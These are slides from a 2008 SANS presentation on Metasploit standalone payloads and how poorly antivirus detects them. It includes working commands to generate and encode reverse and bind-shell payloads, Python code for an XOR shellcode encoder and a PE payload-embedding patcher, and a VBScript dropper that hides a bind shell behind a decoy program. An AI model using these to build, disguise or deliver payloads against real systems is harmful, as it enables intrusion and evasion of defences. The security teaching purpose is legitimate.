Metasploit Payloads and Antivirus
Mark Baggett, December 2008
SANS Technology Institute - Candidate for Master of Science Degree
GIAC GSEC, GCIH

Slide 2: Objectives
– Learn how an attacker might use Metasploit standalone payloads against you
– See how these payloads are created, used and "trojanized"
– Understand what level of protection to expect from your antivirus

Slide 3: How are they used against you?
– Can be executed by tricking a user into running the payload, or via an exploit that is not in the framework
– Execute a payload on a fully patched system
– Use Meterpreter's advanced functionality such as anti-forensics, detection evasion and pivoting
– Scenario:
  – Attacker brute-forces a password to a fully patched machine
  – Runs the Meterpreter payload and uses it to pivot
  – Uses the framework to attack other hosts on the DMZ

Slide 4: msfpayload
– Generates payloads in various formats
  – Source code in C, Perl, Ruby and JavaScript (the J output type)
  – Hexadecimal (RAW)
  – Binary executable formats for Win32; Linux; OS X on Intel, PPC and iPhone
– The JavaScript output automatically selects big-endian or little-endian byte order depending on the processor the payload targets
  – You can override this with a simple modification to msfpayload (js_be, js_le)

Slide 5: Demonstration
– See how these payloads are created

Slide 6: Interacting with payloads
– Some payloads will not work standalone (find_port, find_tag): they search for the socket the exploit arrived on, so there is nothing to find when the payload is run on its own
– Bind shell payloads can be used outside of the framework: connect to the listening port with any TCP client
– Others, such as reverse and staged payloads, require the exploit/multi/handler module, which listens for the connection and delivers the stage

Slide 7: Using multi/handler

Creation (LHOST is the attacker's IP; it is compiled into the payload as the address to call back to):

    ./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.100.5 X > vncrev.exe

Use (the handler listens on the same LHOST and LPORT the payload was built with; a reverse payload connects back on its own, so the handler takes no victim address):

    ./msfcli exploit/multi/handler \
        PAYLOAD=windows/vncinject/reverse_tcp \
        LHOST=192.168.100.5 \
        DisableCourtesyShell=TRUE E

Slide 8: Demonstration
– See how these payloads are used

Slide 9: msfencode
– Encodes a payload using one of several encoder modules
– Expects RAW msfpayload output (the R type) on standard input
– -h for help
– -l list the available encoders
– -e encoder to use
– -t output type
– -b bytes the encoded output must avoid (bad characters)
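What the -b option has to guarantee, shown as an added example that is not msfencode's own code and not x86/shikata_ga_nai (which is polymorphic and uses additive feedback): a single-byte XOR encoder in front of a 32-bit x86 JMP/CALL/POP decoder stub. The encoder searches for a key such that neither the stub, the patched length and key bytes, nor the encoded body contains a listed bad byte, and decode() does in Python what the stub would do on the CPU so the round trip can be checked. The sample payload bytes and the bad-character list are constructed for the example; the stub layout, the offset names and the seed parameter are this example's own.

```python
"""Bad-character-avoiding XOR encoder with an x86 decoder stub.

Added illustration of what an msfencode-style encoder must guarantee when
given a bad-character list (-b).  It is not msfencode and not shikata_ga_nai.
"""
import random

# 32-bit x86 JMP/CALL/POP decoder.  The two placeholder bytes (LEN, KEY) are
# patched in by encode(); the encoded payload follows the stub immediately.
STUB = bytes([
    0xEB, 0x0E,                    # 00: jmp short +0x0E      -> call at 0x10
    0x90,                          # 02: nop (keeps 0x0D out of the stub bytes)
    0x5E,                          # 03: pop esi              ; esi = &payload
    0x31, 0xC9,                    # 04: xor ecx, ecx
    0xB1, 0x00,                    # 06: mov cl, LEN          (patched)
    0x80, 0x36, 0x00,              # 08: xor byte [esi], KEY  (patched)
    0x46,                          # 0B: inc esi
    0xE2, 0xFA,                    # 0C: loop -6              -> xor at 0x08
    0xEB, 0x05,                    # 0E: jmp short +5         -> payload at 0x15
    0xE8, 0xEE, 0xFF, 0xFF, 0xFF,  # 10: call -0x12           -> pop esi at 0x03
])
LEN_OFF, KEY_OFF = 7, 10


def encode(payload: bytes, badchars: bytes, seed=None) -> bytes:
    """Return stub + XOR-encoded payload, or raise if no key avoids badchars.

    Every byte that ends up on disk or on the wire is checked: the stub, the
    patched length and key, and the encoded body.  A real encoder would fall
    back to another encoder (or more iterations) instead of giving up.
    """
    if not 1 <= len(payload) <= 255:
        raise ValueError("the stub counts with CL, so 1..255 payload bytes only")
    keys = list(range(1, 256))          # key 0 would leave the payload unchanged
    random.Random(seed).shuffle(keys)   # random key: same payload, different bytes
    for key in keys:
        stub = bytearray(STUB)
        stub[LEN_OFF] = len(payload)
        stub[KEY_OFF] = key
        blob = bytes(stub) + bytes(b ^ key for b in payload)
        if not any(b in badchars for b in blob):
            return blob
    raise ValueError("no single-byte key avoids %r" % badchars)


def decode(blob: bytes) -> bytes:
    """Do in Python what the stub does at run time, to verify the round trip."""
    if blob[:LEN_OFF] != STUB[:LEN_OFF] or len(blob) <= len(STUB):
        raise ValueError("not output of encode()")
    n, key = blob[LEN_OFF], blob[KEY_OFF]
    return bytes(b ^ key for b in blob[len(STUB):len(STUB) + n])


if __name__ == "__main__":
    # Constructed sample bytes, not real shellcode; they deliberately contain
    # the three bytes most often banned in string-based exploits.
    sample = bytes([0x31, 0xC0, 0x50, 0x68, 0x2F, 0x2F, 0x73, 0x68, 0x00, 0x0A, 0x0D])
    out = encode(sample, b"\x00\x0a\x0d", seed=7)
    print(out.hex())
    assert decode(out) == sample
```

Two things worth noticing: the check covers the stub as well as the body, so banning 0xFF makes encode() fail because the call's rel32 carries it, and a payload of exactly 10 or 13 bytes would fail for a bad-character list of \x00\x0a\x0d because the patched length byte itself would be a bad character. Running it with a different seed gives different bytes on the wire for the same payload, which is the property that breaks static signatures on the raw payload.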

Slide 10: msfencode -> Binary
– Binary was not a selectable output type from msfencode until September 29th, 2008
– Before that, three ways to create a binary:
  – Add three lines of code to msfencode
  – Generate RAW output and use a hex editor to place it in a PE-format binary
  – Generate C source code and compile it
– Now the -t exe option emits an encoded Windows binary directly

Slide 11: msfencode (continued)

    ./msfpayload windows/shell_bind_tcp R | \
        ./msfencode -e x86/shikata_ga_nai -t exe > bindshell.exe

    ./msfpayload windows/shell_bind_tcp R | \
        ./msfencode -e x86/shikata_ga_nai -b "\x41\x42\x43" -t exe > bindshell.exe

– Rex::Text.to_win32pe() builds the executable from data/templates/template.exe
  – Use your own binaries as templates by marking the payload location with a "PAYLOAD:" tag
  – to_win32pe writes a random image base into the template's ImageBase field (4 bytes at offset 0x88), so every generated file differs
  – Roll your own template with template.c
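How a tag-based template like data/templates/template.exe receives its payload, as an added example that is not Rex::Text.to_win32pe itself: the patcher finds the PAYLOAD: tag, copies the raw shellcode over the reserved cave, and writes a fresh random ImageBase. Instead of hard-coding the slide's offset 0x88, it walks the MZ and PE headers to locate the ImageBase field, which is what lets it work against a template of your own. The template here is a constructed in-memory PE32 header skeleton (not a loadable program), the 8192-byte cave size and the ImageBase range are assumptions, and the function names are this example's own.

```python
"""Tag-based PE templating in the style of to_win32pe.

Added illustration; the template is a constructed PE32 skeleton that carries
only the headers the patcher reads, not a runnable program.
"""
import random
import struct

TAG = b"PAYLOAD:"
CAVE_SIZE = 8192            # assumed size of the reserved region that starts at TAG
PE32_MAGIC = 0x10B          # optional-header magic for 32-bit images


def build_template(e_lfanew: int = 0x40) -> bytes:
    """Construct a minimal PE32 skeleton: MZ stub, PE headers, one section, cave."""
    dos = bytearray(e_lfanew)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)           # e_lfanew -> "PE\0\0"
    # COFF header: Machine=i386, 1 section, timestamp, symtab ptr/count,
    # SizeOfOptionalHeader=224, Characteristics=EXECUTABLE_IMAGE|32BIT_MACHINE
    coff = struct.pack("<HHIIIHH", 0x014C, 1, 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    struct.pack_into("<I", opt, 28, 0x00400000)            # ImageBase (default)
    section = bytes(40)                                    # one blank section header
    cave = TAG + bytes(CAVE_SIZE - len(TAG))               # tag, then zeroed space
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + section + cave


def image_base_offset(pe: bytes) -> int:
    """File offset of ImageBase, found by walking the headers (0x88 in the slide's template)."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    opt = e_lfanew + 4 + 20                                # skip signature + COFF header
    if struct.unpack_from("<H", pe, opt)[0] != PE32_MAGIC:
        raise ValueError("PE32+ not handled (ImageBase is a QWORD at +24 there)")
    return opt + 28


def read_image_base(pe: bytes) -> int:
    return struct.unpack_from("<I", pe, image_base_offset(pe))[0]


def embed(template: bytes, code: bytes, seed=None) -> bytes:
    """Copy code over the PAYLOAD: cave and randomise ImageBase, as to_win32pe does."""
    if len(code) > CAVE_SIZE:
        raise ValueError("payload larger than the %d-byte cave" % CAVE_SIZE)
    bo = template.find(TAG)
    if bo < 0 or bo + CAVE_SIZE > len(template):
        raise ValueError("template has no usable PAYLOAD: tag")
    pe = bytearray(template)
    pe[bo:bo + CAVE_SIZE] = code.ljust(CAVE_SIZE, b"\0")   # tag is overwritten too
    # Random 64 KiB-aligned base in 0x30000000..0x4FFFFFFF (range is an assumption).
    # The changed header bytes give every generated file a different hash.
    base = 0x30000000 + random.Random(seed).randrange(0, 0x20000000, 0x10000)
    struct.pack_into("<I", pe, image_base_offset(pe), base)
    return bytes(pe)


if __name__ == "__main__":
    tmpl = build_template()
    exe = embed(tmpl, bytes(range(1, 65)), seed=1)   # constructed 64-byte "payload"
    print("ImageBase 0x%08X -> 0x%08X" % (read_image_base(tmpl), read_image_base(exe)))
```

With the default e_lfanew of 0x40 the ImageBase field sits at 0x74; a template whose PE signature starts at 0x54 puts it at 0x88, the offset on the slide. Because the base is derived from the headers rather than a fixed number, a wrong guess fails loudly on the PE32+ check instead of silently corrupting some other field.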

Slide 12: Turning payloads into trojans
– IExpress is a self-extracting package (setup) utility that ships with Windows XP
– It can create packages that visibly execute a benign host program and invisibly execute a malicious payload
– All you need is a small VBScript that launches the payload in a hidden window
– Trojanized payloads only temporarily avoid antivirus

Slide 13: Payload script

    ' Run the decoy in a normal window (style 1), then the payload hidden (style 0);
    ' the third argument (False) means do not wait for either program to exit.
    Set WshShell = WScript.CreateObject("WScript.Shell")
    WshShell.Run "mspaint.exe", 1, False
    WshShell.Run "bindshell.exe", 0, False

Quick IExpress demonstration
– See how these payloads are "trojanized"

Slide 14: Level of protection to expect from your antivirus
– Expected results: a low detection rate for unencoded payloads and no detection for encoded payloads
– Actual results: no detection of either unencoded or encoded payloads; only two products' heuristics flagged them
– PaulDotCom episode 125 (end of September 2008) found that six products detected the payload
– My HIPS testing yielded disappointing results
– HD Moore has stated that version 3.2 will generate a new Windows binary that is harder to detect

Slide 15: Summary
– Metasploit is a powerful framework with a diverse set of tools
– Using these tools, attackers can easily create standalone payloads that run on fully patched systems
– Antivirus products do not at this time provide adequate protection against Metasploit payloads
– My paper is in the SANS Reading Room, titled "Effectiveness of Antivirus in Detecting Metasploit Payloads"

